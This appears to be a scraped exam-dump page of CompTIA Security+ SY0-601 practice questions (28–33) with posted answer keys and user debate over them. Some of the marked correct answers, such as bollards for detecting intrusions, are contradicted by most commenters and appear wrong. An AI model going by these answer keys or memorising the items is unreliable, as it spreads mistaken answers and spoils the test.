Answer: Hiring an employee who has been convicted of theft to adhere to industry compliance - As this is a compliance officer, they would likely
need to be concerned with complying with industry regulations regarding the employees they hire. For example, PCI DSS requires background
checks for employees handling credit card information.

Background checks generally only allow employers to view criminal and court records, so it could be helpful for an employer to know if a
candidate has a record for theft with a background check when determining employment.
upvoted 2 times

  Bench300 3 months, 1 week ago


According to Exam-Labs Premium, C is the correct answer. Despite being counterintuitive.
upvoted 2 times

  HaSeongKim 3 months, 2 weeks ago


Answer is B.
Maybe Human Resource team might be checking for false info on resume, but as a Chief Compliance Officer's point of view will check for
criminal record. I don't think Chief Compliance Officer will even look at one's resume, but conduct or request background check with name,
DOB, POB, Gender, SSN, and fingerprint, which these information are not on resumes.
upvoted 1 times

  Libraboy 3 months, 2 weeks ago


Selected Answer: B
In general, background checks for employment typically cover seven years of criminal and court records, but may go back further depending on
federal and state laws and what is being searched.
What is the background verification process in HR?
Background verification is a process many organizations carry out in order to verify the information provided by the candidate during hiring. It
involves various checks in which the employer will go through your education records, past employer details, identity checks, resume checks and
address checks.
upvoted 2 times

  TEKE 3 months, 3 weeks ago


answer is C
upvoted 1 times

  CyberU 4 months, 1 week ago


Selected Answer: B
Compliance officer would be concerned about industry compliance and hence B seems relevant.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 48/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #28 Topic 1

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should
be disabled.
Which of the following can be used to accomplish this task?

A. Application allow list

B. SWG

C. Host-based firewall

D. VPN

Correct Answer: B

Community vote distribution


C (62%) B (37%)

  YusufMadkour Highly Voted  5 months, 1 week ago


Selected Answer: C
Not A or D.
Was not sure whether it should be B or C until I read the definition of SWGs in the official guide from CompTIA.

"An on-premises SWG is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet
sites and services"
upvoted 20 times

  NICKJONRIPPER 2 months, 2 weeks ago


So must be B, same result, but you can not configure 100 host-based firewall as C
upvoted 2 times

  shitgod 1 month, 2 weeks ago


Why not? It's so common and easy with cloud orchestration tools.
upvoted 2 times

  Mondicles Highly Voted  4 months, 2 weeks ago


Selected Answer: C
This one asks which one is used for port blocking in WEB SERVERS.
SWG is primarily used to protect USERS from accessing or being infected by web threats.
I'll go with firewalls to explicitly allow 443.
upvoted 11 times

  OnA_Mule Most Recent  1 day, 16 hours ago


Selected Answer: A
An application allow list is a security measure used to specify which applications and protocols are allowed to run on a network. By using an
application allow list, an engineer can restrict the web servers to only allow port 443 (HTTPS), as per the security policy, and block all other ports,
ensuring that confidential data is not exposed to unauthorized users. The other options listed (SWG, host-based firewall, and VPN) may provide
additional security measures but would not directly accomplish the task of disabling all web-server ports except 443.
upvoted 1 times

  ronniehaang 5 days, 1 hour ago


Selected Answer: C
C. Host-based firewall
upvoted 1 times

  DALLASCOWBOYS 6 days, 12 hours ago


B. Secure web gateways monitor web requests, and ensure they are consistent with organization strategy and policy. SWG picks up where the
VPN drops off. The question states to be consistent with company policy. The SWG blocks requests that run afoul of the requirements of the
security policy
upvoted 1 times

  DuoIsAlive 1 week ago


Selected Answer: C
A. Application allow list or C. Host-based firewall

An application allow list can be used to specify which ports are open and which are closed on each server, allowing the engineer to close all ports
except 443 on the web servers. A host-based firewall is also a software or hardware solution that can be used to control incoming and outgoing
network traffic on a per-server basis, and can be used to configure the servers to only allow traffic on port 443.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 49/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  EricShon 1 week, 5 days ago


Selected Answer: C
C. Host-based firewall.

A host-based firewall is software that runs on a specific host and controls incoming and outgoing network traffic based on predefined rules. In
this case, the engineer could use a host-based firewall to block all ports except 443 on the web servers, effectively disabling all ports except for
the one used for HTTPS traffic.

A. Application allow list is a security feature that allows access to specific applications or services on a network.
B. SWG is Secure Web Gateway, a security solution that controls access to websites and web applications by blocking unauthorized users from
accessing restricted web pages.
D. VPN is a Virtual Private Network, it creates a secure, encrypted connection between two networks or between an individual user and a
network.
upvoted 1 times

  Deeppain90 1 week, 6 days ago


Selected Answer: B
not C, C is host based FW instal on PC its not global firewall so it mast be SWG
upvoted 1 times

  P0wned 2 weeks, 5 days ago


Selected Answer: C
A. Application allow list: Allows or denies access to specific apps.
B. SWG: Blocks malicious web traffic.
C. Host-based firewall: Controls network access to a host.
D. VPN: Connects remote users to a private network.
upvoted 2 times

  asum 3 weeks, 2 days ago


B. SWG scans transactions on the standard ports indicated below, as long as the appropriate modules are activated
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: B
Key words: "A host-based firewall is a piece of firewall software that runs on an individual computer or device connected to a network."

In this case, we are configuring settings for 100 web servers, not one computer
SWG works best for an entire network of servers.
upvoted 3 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
I taking cloud has key word which makes SWG better choice
upvoted 2 times

  mike47 1 month, 2 weeks ago


Selected Answer: B
A secure web gateway is an on-premise or cloud-delivered network security service.
https://www.checkpoint.com/cyber-hub/network-security/what-is-secure-web-gateway/
upvoted 3 times

  Feline 1 month, 3 weeks ago


One of the components of SWG is to enforce security policy and host based firewalls enforce rules. Considering this, the best answer would be
SWG.
upvoted 3 times

  tek7ila 1 month, 4 weeks ago


Here https://digital.com/best-web-hosting/what-is-a-secure-web-gateway/ You can read that SWG allows you to filter network connections by
TCP ports.

With C. the problem is the amount of web servers. Tooo many for admin to configure. I don't think that the amount of servers in the question is by
accdient equal to 100.
upvoted 1 times

  Renfri 2 months ago


Selected Answer: B
It's B. Definitely not C, just because it has "FIREWALL" on its name doesn't mean it's the right answer.
upvoted 2 times

  Blazingfire 2 months ago


Selected Answer: B
SWG : A secure web gateway is an on-premise or cloud-delivered network security service. Sitting between users and the Internet, secure web
gateways provide advanced network protection by inspecting web requests against company policy to ensure malicious applications and
websites are blocked and inaccessible

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 50/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Host Base Firewall has to be configured for all 100 Server, which is not feasible.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 51/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #29 Topic 1

A technician was dispatched to complete repairs on a server in a data center. While locating the server, the technician entered a restricted area
without authorization. Which of the following security controls would BEST prevent this in the future?

A. Use appropriate signage to mark all areas.

B. Utilize cameras monitored by guards.

C. Implement access control vestibules.

D. Enforce escorts to monitor all visitors.

Correct Answer: B

Community vote distribution


C (100%)

  Mamun1 Highly Voted  5 months, 1 week ago


Selected Answer: C
How would the guard know every individual and their access rights?
The access control vestibule (AKA Mantrap) seems to be more appropriate to me.
upvoted 14 times

  rhocale 1 month, 4 weeks ago


it wouldnt stop them just inform them
upvoted 1 times

  ronniehaang Most Recent  5 days, 1 hour ago


Selected Answer: C
C. Implement access control vestibules or mantrap, security mantrap portal, airlock, sally port is a physical security access control system
comprising a small space with two sets of interlocking doors, such that the first set of doors must close before the second set opens.
upvoted 1 times

  DALLASCOWBOYS 6 days, 11 hours ago


C. access control vestibule is the BEST answer, as access control vestibules control access to the most secured, valuable areas of a facility. D is
also a good answer as security guards should know which areas are restricted. A & B are only deterrent controls.
upvoted 1 times

  Samsonite363 1 week, 5 days ago


Selected Answer: C
This is so obvious.
upvoted 1 times

  xxxdolorxxx 2 weeks ago


Selected Answer: C
Why not C?
"Implement access control vestibules"
Access control to a vestibule wouldn't prevent someone to enter a restricted area?
upvoted 1 times

  asum 3 weeks, 2 days ago


B. I think B can be a choice. A Gaurd can see on Camera if someone is entering a restricted area and prevent access immediately.
upvoted 1 times

  Zigster 3 weeks, 2 days ago


Selected Answer: C
Mantrap
upvoted 1 times

  nukimoya 2 months ago


why is no one saying A?
upvoted 4 times

  560exam 2 months ago


The question says "Best Prevent" in the future. You can add signs that says restricted area (option A) but that's not going to prevent someone
from getting in those areas. I agree with C.
upvoted 2 times

  nischal123 2 months, 3 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 52/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

C makes the most sense. Camera helps monitoring but it does not prevent from happening.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Implement access control vestibules

An access control vestibule, or mantrap, is a physical access control system designed to prevent unauthorized individuals from following
authorized individuals into facilities with controlled access. This question is asking for a way to prevent physical access to restricted area and this
method would address this.
upvoted 2 times

  carpathia 2 months, 4 weeks ago


Selected Answer: C
Keyword "prevent" - preventative controls: mantrap etc.
upvoted 1 times

  Sklark 3 months, 2 weeks ago


Guards can be social engineered. Answer is C
upvoted 1 times

  CyberU 4 months, 1 week ago


Selected Answer: C
access control mechanism
upvoted 1 times

  Gravoc 4 months, 3 weeks ago


C makes the most sense. All other options get overly complex too quickly, when a man trap is the simplest. It's a physical barrier that can be
socially engineered, or requiring constant surveillance.
upvoted 1 times

  Joe1984 5 months ago


I agree with C, but an escort would ensure you only went to the correct place with out wandering.
upvoted 3 times

  TBLaxen 5 months ago


Selected Answer: C
Just because there's a camera doesn't prevent the technician from entering the restricted area. Answer must be C.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
Answer should be C here. Access control vestibule (mantrap).
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 53/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #30 Topic 1

Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions
and policies based on location, role, and service level?

A. Standard naming conventions

B. Domain services

C. Baseline configurations

D. Diagrams

Correct Answer: B

Community vote distribution


A (74%) B (26%)

  yoloson Highly Voted  5 months, 1 week ago


Selected Answer: A
Quoting from the official guide below.
A standard naming convention for hardware assets, and for digital assets such as accounts and virtual machines, makes the environment more
consistent. This means that errors are easier to spot and that it is easier to automate through scripting. The naming strategy should allow
administrators to identify the type and function of any particular resource or location at any point in the CMDB or network directory. Each label
should conform to rules for host and DNS names.
upvoted 21 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Standard naming conventions

These are naming frameworks used for naming hardware assets, and for digital assets such as accounts and virtual machines in a consistent
way. The naming strategy should allow administrators to identify the type and function of any particular resource or location at any point.
=============================
Helpful Info:
Domain Services - Services that stores centralized directory information and lets users and domains communicate. When a user attempts to
connect to a device or resource on a network, this service provides login authentication, verifying the user's login credentials and access
permissions.

Baseline configuration - A documented set of specifications for an information system, or a configuration item within a system, that has been
formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures.
upvoted 8 times

  OnA_Mule Most Recent  1 day, 16 hours ago


Selected Answer: B
Read the question. A naming convention wouldn't help "and manage permissions and policies based on location, role, and service level." The
only item in the list that would help with this part of the question is Domain Services.
Proper naming convention will help to identify the host, but it won't help with the management of that host better than a domain service, like
Active Directory
upvoted 1 times

  ronniehaang 5 days, 1 hour ago


Selected Answer: B
B. Domain services

Domain services are used in the administration of computer networks to centralize management and control of resources and security. For
example, Active Directory (AD) is a domain service that provides a centralized and organized approach to managing users, computers, groups,
and other resources in a network. It enables the administrator to assign permissions and policies based on location, role, and service level, and
to manage these policies from a central location, reducing the administrative workload and improving security. For instance, an administrator can
assign permissions for access to specific systems or applications based on the role of the user, such as developers, sales, or support personnel,
and can enforce these permissions regardless of the user's physical location.
upvoted 1 times

  DALLASCOWBOYS 6 days, 11 hours ago


A. Standard naming conventions can assist with locating files.
upvoted 1 times

  DuoIsAlive 1 week ago


Selected Answer: B
B. Domain services

Domain services, such as Active Directory, provide centralized management and control of user accounts, computers, and other resources on a
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 54/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

network. These services allow the administrator to create and manage user and computer accounts, assign permissions and policies, and control
access to resources based on location, role, and service level. They also allow for efficient identification of systems and management of
permissions and policies, which is what the question is asking for.

Standard naming conventions, Baseline configurations, and Diagrams can also provide useful information for system administrators, but they
would not offer the same level of centralized management and control as domain services.
upvoted 1 times
  EricShon 1 week, 5 days ago
B. Domain services.

Domain services, such as Active Directory, provide a centralized way for a systems administrator to manage user and device identities,
permissions and access controls, and group policies. This allows the administrator to more efficiently identify systems based on location, role,
and service level, and apply appropriate policies and permissions.

A. Standard naming conventions are a way to organize and identify systems based on a consistent naming scheme, but they don't provide the
ability to manage permissions and policies based on location, role, and service level.
C. Baseline configurations are a way to establish standard configurations for systems, but they don't provide the ability to manage permissions
and policies based on location, role, and service level.
D. Diagrams are a way to visually represent the architecture of a network, but they don't provide the ability to manage permissions and policies
based on location, role, and service level.
upvoted 2 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
As a former NOC, we can identify the device functions, applications and prod/non-prod environment via naming conventions.
upvoted 1 times

  asum 3 weeks, 2 days ago


Selected Answer: A
A. As COMPTIA guide mentions. A standard naming convention for hardware assets, and for digital assets such as
accounts and virtual machines, makes the environment more consistent. This means
that errors are easier to spot and that it is easier to automate through scripting. The
naming strategy should allow administrators to identify the type and function of any
particular resource or location at any point in the CMDB or network directory. Each
label should conform to rules for host and DNS names (support.microsoft.com/en-us/

help/909264/naming-conventions-in-active-directory-for-computers-domains-sites and). As well as an ID attribute, the location and function of
tangible and digital assets
can be recorded using attribute tags and fields or DNS CNAME and TXT resource
records.
upvoted 1 times

  Mr_BuCk3th34D 1 month, 1 week ago


Selected Answer: B
B. Domain services would provide a systems administrator with the ability to more efficiently identify systems and manage permissions and
policies based on location, role, and service level. Domain services, such as Active Directory in the Windows environment, allow administrators to
manage access to resources, including computers, networks, and applications, based on defined policies and rules. They also provide a
centralized system for storing user and group information, making it easier to manage and control access to resources within an organization.

A. Standard naming conventions may help to more easily identify systems, but they do not provide the same level of control over permissions
and policies as domain services.
upvoted 2 times

  Mr_BuCk3th34D 1 month, 1 week ago


I think I might change my mind because of the wording on the alternative, here's why:

A directory service is a system that stores, organizes, and manages information about network resources, including devices, users, and
services. It provides a central location where this information can be stored, accessed, and managed in a consistent and organized way.
Directory services can be used to manage permissions and policies based on location, role, and service level by organizing resources into
different groups or categories and assigning permissions or policies to these groups.

A domain service, on the other hand, is a network service that allows a system to join a domain and authenticate with other systems in the
domain. A domain is a logical grouping of network resources that share the same AD database and can be managed as a unit.

So, while directory services and domain services are related, they are not the same thing!

Directory services are used to store and manage information about network resources, while domain services are used to manage access to a
domain and authenticate users and systems within the domain.
upvoted 1 times

  bengy78 2 months, 3 weeks ago


Its A, naming standard. Per Comptia Certmaster "The naming strategy should allow administrators to identify the type and function of any
particular resource or location at any point in the CMDB or network directory"
upvoted 1 times

  carpathia 2 months, 4 weeks ago


Selected Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 55/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

" efficiently identify systems and manage permissions and policies based on location, role, and service level". They purposely missed the "then"
after the Identify Systems.
upvoted 1 times
  IYKMba 3 months ago
Domain Services stores centralized directory information and lets users and domains communicate. When a user attempts to connect to a device
or resource on a network, this service provides login authentication, verifying the user's login credentials and access permissions.
Domain services is the correct answer
upvoted 2 times

  Jimmycyber123 3 months ago


Selected Answer: A
Anyone picking B should lose their job. That is all. A or leave it blank as you will get the same amount of points.
upvoted 3 times

  Renfri 2 months ago


You should lose your job if you think standard naming convention has anything to do with managing permissions and policies.
upvoted 6 times

  alwaysrollin247 1 month, 3 weeks ago


You should lose your job if you're not naming your domains using a standard naming convention.
upvoted 2 times

  Gary_Phillips_2007 1 month, 3 weeks ago


You should lose your job if you’re not really always rollin. ;)
upvoted 1 times

  devampz 4 months ago


Selected Answer: B
Manage permission is what Standard naming conventions does not have. The answer should be B Domain Services
upvoted 5 times

  _bishalk__ 4 months, 1 week ago


Key point here "identify systems and manage permissions" Standard naming convention will help identifying but question also says manage
permission so correct answer is Domain Service.
upvoted 5 times

  devampz 4 months ago


same idea
upvoted 1 times

  Gravoc 4 months, 3 weeks ago


Naming conventions. The keyword in this question is identify. Per the official CompTIA Sec+ study guide: "Hardening endpoints involves knowing
which systems you're managing and ensuring that the systems on your network are the systems that you expect. Standards can help with that.
The Security+ exam calls out standard naming conventions as one option. They can help you identify systems based on purpose, location, or
other elements included in the naming convention. They make scripting and management easier because you can filter, sort, and take other
actions more easily using a standard naming convention".
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 56/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #31 Topic 1

Which of the following would detect intrusions at the perimeter of an airport?

A. Signage

B. Fencing

C. Motion sensors

D. Lighting

E. Bollards

Correct Answer: E

Community vote distribution


C (96%) 2%

  ender1701 Highly Voted  5 months ago


Selected Answer: C
Seriously, how does Bollards get identified as the correct answer on this site? It doesn't detect, it deters. It's a post.
upvoted 22 times

  Sklark 3 months, 2 weeks ago


Hahaha your response is priceless! "Oh no! We must be very stealthy. We wouldn't want the bollards to see us!!"
upvoted 6 times

  4342421222 4 months ago


Right, but the first rule of security is physical. That's why it's correct. You would detect a vehicle driving up to a Bollard. Motion Senors are
similar to IDS's. Important, but physical is the more important part of the question.
upvoted 1 times

  Nokia6681 4 months ago


Bollards are preventive, and Motion sensors are detection. Que says "detect".
upvoted 5 times

  creativenickname 4 months ago


But the question is "Which of the following would detect intrusions at the perimeter of an airport?". It's asking what object would detect.
Bollards can't detect anything, they're a cement or metal rod in the ground.
upvoted 3 times

  m33lz 1 month, 3 weeks ago


Highly Voted 
who reviews these questions and answers . Bollards seriously .. its difficult to study when 60% of the answers are wrong .
upvoted 6 times

  DALLASCOWBOYS 6 days, 11 hours ago


Most Recent 
C. Motion sensors are devices that senses movement or sound in a specific area.
upvoted 1 times

  JustIyke 3 weeks, 2 days ago


Motion sensor is definitely the correct answer. Lighting comes close but the keyword here is "detect" and that eliminates all the other options.
upvoted 1 times

  CL_QRT 3 weeks, 4 days ago


I'll go with C.
upvoted 1 times

  lferolm 1 month ago


Selected Answer: D
From Comptia book:

...
Protective lighting improves visibility for checking badges and people at entrances, inspecting vehicles, and detecting intruders both outside and
inside buildings and grounds.
...
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Yes but the lights don't detect anything, they deter criminals. On the other hand motion sensors activate when someone comes within their
vicinity, making them "detect" the threat.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 57/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Besmira 2 months ago
A perimeter intrusion detection system (PIDS) is a device or sensor that detects the presence of an intruder attempting to breach the physical
perimeter of a property, building, or other secured area.
So the best answer is C
upvoted 1 times

  Nirmalabhi 2 months, 1 week ago


Selected Answer: C
The correct answer according to me is C.Motion sensors. The key word in the question is "detect". something that will alert that there is an
intrusion.
Bollards can act as physical barrier but it cannot detect if some intruder crossed it or even fencing can be tripped but how will it detect if
someone jumped a fence or not? Signage can only act as deterrent.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


The answer is fencing. For this specific scenario, we're looking to detect intrusions on a perimeter and there is a type of intrusion detection
system used on fences that can be used to monitor the perimeter of a property called PIDS. A Perimeter Intrusion Detection System (PIDS) are
fence-mounted sensors that monitor and detects any intruder attempting to breach the physical perimeter by sensing when someone attempts to
either climb or cut the fence.

Yes, Motion sensors can detect any movement but this can easily lead to false alarms as they aren't the best for detecting types of movement.
For example, a motion detector that detects an employee authorized to access a restricted area. Just because it detected motion doesn't mean
necessarily mean they're intruders. PIDS will only generate an alarm when someone attempting to climb/cut a fence as that type of action this
would very likely be an intrusion attempt.
upvoted 2 times

  Orean 3 months ago


Selected Answer: B
One of the rare times I confidently disagree with the vast majority of votes.

"Fibre optic cable is designed to detect and pinpoint the location of intrusion anywhere on the airport perimeter fence, providing real-time
reporting of intrusion"

Operative word is PERIMETER, where there's fencing. Yes, fencing sounds like a simple preventive measure, but it's often also a detective one
for airports which have fiber-optic IDSs.
upvoted 1 times

  [Removed] 2 months, 3 weeks ago


Actually the operative word is "detect."
upvoted 1 times

  ipin 4 months ago


maybe when a truck hit the bollards......
upvoted 4 times

  emtpyspoon885 4 months, 1 week ago


Selected Answer: C
Not sure how billards would detect
upvoted 1 times

  jaredsmith677 4 months, 1 week ago


Bollards are usually steel stanchions filling with concrete...i dont know what the detection capabilities of that would be? but what does COMPTIA
score for this question?
upvoted 1 times

  Wutan 4 months, 2 weeks ago


Selected Answer: C
Motion sensors of course.
upvoted 1 times

  Wazza1878 4 months, 2 weeks ago


Motion sensors
upvoted 1 times

  Gravoc 4 months, 3 weeks ago


This question is a great example of not trusting the official answer. Bollards? LMAO. Still don't trust the discussion answers, as I've disagreed
with a few general consensuses after doing deep dives into the topic.

Bollards - Physical barrier


Signage - Can be a deterrent depending on the context of the sign message, such as "RESTRICTED AREA".
Lighting - A deterrent in security settings.
Motion sensors - A detection method, in which an alarm or alert is triggered the moment it detects motion.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 58/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Phresh90 4 months, 2 weeks ago


Right! I agree. I was just telling myself that. How does a bollard detect? Like really...
upvoted 1 times

  RonWonkers 4 months, 3 weeks ago


Selected Answer: C
lmao how is it a bollard bruh
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 59/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #32 Topic 1

A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the
following is the
BEST remediation strategy?

A. Update the base container Image and redeploy the environment.

B. Include the containers in the regular patching schedule for servers.

C. Patch each running container individually and test the application.

D. Update the host in which the containers are running.

Correct Answer: B

Community vote distribution


A (64%) C (18%) Other

  Gravoc Highly Voted  4 months, 3 weeks ago


A is incorrect. The answer is D. Really shows that the voters don't know much about containers here. A container is merely a text file that
allocates resources and libraries to a virtual environment, which in turn allows an application to function in an isolated environment. That's it

The containers share the same Kernel as the base host system. Only the system Kernel and a text file of allocated resources and libraries stands
between a critical vulnerability, and gaining access to the standard host computing environment. Swiss Cheese model and Defense-in-Depth
applies here. Since there's no update to be applied to the container, and the base host & containers all are reliant on the same Kernel. Keeping
the host system up to date with all security patches and firmware patches is the best way to prevent a critical vulnerability from breaking out of a
container.

Look up the container hierarchy, "dirty-pipe-exploit', and Docker software.

Hardware > OS > Virtual Machine > Docker > Container

Updating the host machine is absolutely the answer.


upvoted 21 times

  _bishalk__ 4 months, 1 week ago


The only thing container shares with host machine is kernel so if we patch and upgrade the kernel version doesnt necessarily it will eliminate
the vulnerabilities associated with other packages in repos of that container so best way to patch a container must be followed. and that is
only possible when someone update the base container image and redeploy it. so correct answer is A here.
upvoted 4 times

  VendorPTS 4 months ago


Agreed. It's a bit of a tricky one because Gravoc isn't wrong that the host OS and kernel vulnerabilities there are important, but the
question says the analyst is concerned about "critical vulnerabilities that have been detected on some applications running *INSIDE*
containers." As you mentioned, aspects of the vulnerability may be limited to what is running in the container.

Read the section "Containers let you patch continuously, automatically" in the article below

https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-how-containers-enable-passive-patching-
and-a-better-model-for-supply-chain-security
upvoted 8 times

  kennyleung0514 3 months, 2 weeks ago


agreed. As containers should be short-life, or be more accurate, it should not have any modifications once deployed. If there's any
update on the containers, it would be faster to deploy it with updated base image
upvoted 5 times

  Bob455 4 months, 2 weeks ago


THANK YOU SOMEONE
upvoted 2 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Update the base container image and redeploy the environment (A)

In the scenario, the vulnerabilities found were critical meaning that patches would need to be applied immediately.

The options to patch the containers (B &C) could work, however, patching would likely take months, seeing how this vulnerability is critical,
neither would address the concern's urgency.

The option to update the host (D) also could work, however, the scenario specified that the vulnerabilities have been detected only on some
applications and not on the host itself. While a container runs on a host machine, it does not mean they share the same vulnerabilities. So
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 60/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

updating the host would likely not patch the vulnerabilities that were found in the containers.

Out of the given options, the option to update on the base container image would 1.) addresses where the vulnerabilities were found and what
needs to be updated and 2.) addresses the urgency to patch the critical vulnerability.
upvoted 9 times
  ronniehaang Most Recent  4 days, 22 hours ago
Selected Answer: A
A. Update the base container Image and redeploy the environment.

The best remediation strategy for addressing vulnerabilities in containers is to update the base container image and redeploy the environment.
This will ensure that all containers created from that image will be free from the critical vulnerabilities. Updating each running container
individually and testing the application can be time-consuming and error-prone. Updating the host in which the containers are running may not
address the vulnerabilities in the individual containers. Including the containers in the regular patching schedule for servers may not provide a
quick enough response time to address critical vulnerabilities.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


This is bad question. D is the best answer. Container security is the implementation of security measures at the container host, as welll as
withing= the container itself, however, adding security products into a container can be challenging to impossible.
upvoted 1 times

  TheDarkSide2405 2 weeks, 4 days ago


La mejor estrategia de remediación en este caso sería la opción A. "Actualizar la imagen base del contenedor y volver a desplegar el entorno."

La razón detrás de esta respuesta es que actualizar la imagen base del contenedor garantiza que se incluyen las últimas actualizaciones de
seguridad y correcciones de vulnerabilidades. Esto asegurará que todos los contenedores basados en esa imagen también se beneficien de las
actualizaciones. Además, volver a desplegar el entorno también proporciona la oportunidad de verificar que la aplicación sigue funcionando
correctamente después de la actualización.
upvoted 1 times

  rumblerally 3 weeks, 2 days ago


A. Update the base container image and redeploy the environment.
This is the best option because updating the base container image will ensure that any critical vulnerabilities that were present in the previous
version of the image will be fixed in the updated version. Redeploying the environment with the updated image will ensure that all of the running
containers are using the updated, secure image. Additionally, since updating the base image and redeploying the environment would impact all
the running containers, it would prevent from missing any of them

B. Including the containers in the regular patching schedule for servers is another good practice to keep them updated but it would not address
the current vulnerabilities

C. Patching each running container individually could be very time-consuming and prone to errors.

D. Updating the host in which the containers are running should be part of a regular maintenance schedule and it is not directly addressing the
vulnerabilities in the containers.
upvoted 2 times

  Abdul2107 4 weeks, 1 day ago


Selected Answer: A
The answer is B according to this Google Article:
https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-how-containers-enable-passive-patching-and-a-
better-model-for-supply-chain-security
upvoted 1 times

  hieptran 1 month ago


Selected Answer: C
C is the correct answer.
Since A - does not include the testing phase -> it's not the best answer.
Also, only some containers are vulnerable. Not all of them need to be re-image (form up update) then redeploy. This would take much longer time
to rebuild and redeploy everything and could impair the Availability (CIA) of the applications.
upvoted 2 times

  krayxay 1 month, 2 weeks ago


Selected Answer: C
Googled the question and two other sites says C?
upvoted 2 times

  jansoid 2 months, 4 weeks ago


Selected Answer: C
Considering not all containers are affected.
upvoted 2 times

  babyzilla 3 months ago


Selected Answer: A
The reason I chose A over B, is because B would likely take too long to address a critical vulnerability. The scheduled patch could be weekly or
monthly.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 61/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Gr3gg3 3 months ago
Selected Answer: A
Containers are immutable objects, so software updates take the form of replacing the previous version with an updated one
upvoted 1 times

  be9z 3 months, 2 weeks ago


The answer is C. First you need to understand that securing container images is number one way of implementing container security best
practices.

You also need to know that container images are used to create containers. And that applications are included in container images.

In the question, SOME applications in containerS have vulnerabilities. This implies that not all the containers are vulnerable. To carefully ensure
security, try patching each container and testing them for remediation purpose.
upvoted 3 times

  Knowledge33 3 months, 2 weeks ago


Selected Answer: C
The response is C. The vulnerability is on some apps on certains containers. We don't need to update the Host ( D is false) because if the issue is
related to the app, it will not solve the issue.
upvoted 2 times

  DandyAndy 4 months, 1 week ago


Selected Answer: D
D You have to update the base machine
upvoted 2 times

  Strykar 4 months, 1 week ago


Selected Answer: D
I agree with Gravoc.
upvoted 1 times

  Halaa 4 months, 2 weeks ago


Selected Answer: A
Update the base container Image ,as vulnerability is inside the containers itself.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 62/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #33 Topic 1

An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater
than the five- year cost of the insurance policy. The organization is enabling risk:

A. avoidance.

B. acceptance.

C. mitigation.

D. transference.

Correct Answer: D

Community vote distribution


D (100%)

  [Removed] Highly Voted  5 months, 1 week ago


Selected Answer: D
D. transference.
upvoted 10 times

  varun0 Highly Voted  5 months ago


Transference as the financial loss if the risk materializes is transferred to the insurance company
upvoted 7 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


D. Any time insurance is used, you are transferring the risk to the insurance company
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Risk Transference

Risk Transference is transferring risk to a third party such as a vendor. In cyber security, that can be through utilizing cyber-risk insurance. Cyber
insurance generally covers a business' liability for a data breach involving sensitive customer information, such as account numbers, credit card
numbers, health records etc.

==============================================
Other Choices:

Risk Avoidance - Strategy that eliminates risk by avoiding activities that would expose themselves to the risk.

Risk Mitigation - the practice of reducing the impact of risks through preventative and reactive planning

Risk Acceptance - When a business or individual accepts the potential loss from a risk. Generally occurs when the business or individual feels
that the risk does not warrant the countermeasures.
upvoted 3 times

  Gr3gg3 3 months ago


Selected Answer: D
D. Transferring the risk to a Third Party
upvoted 1 times

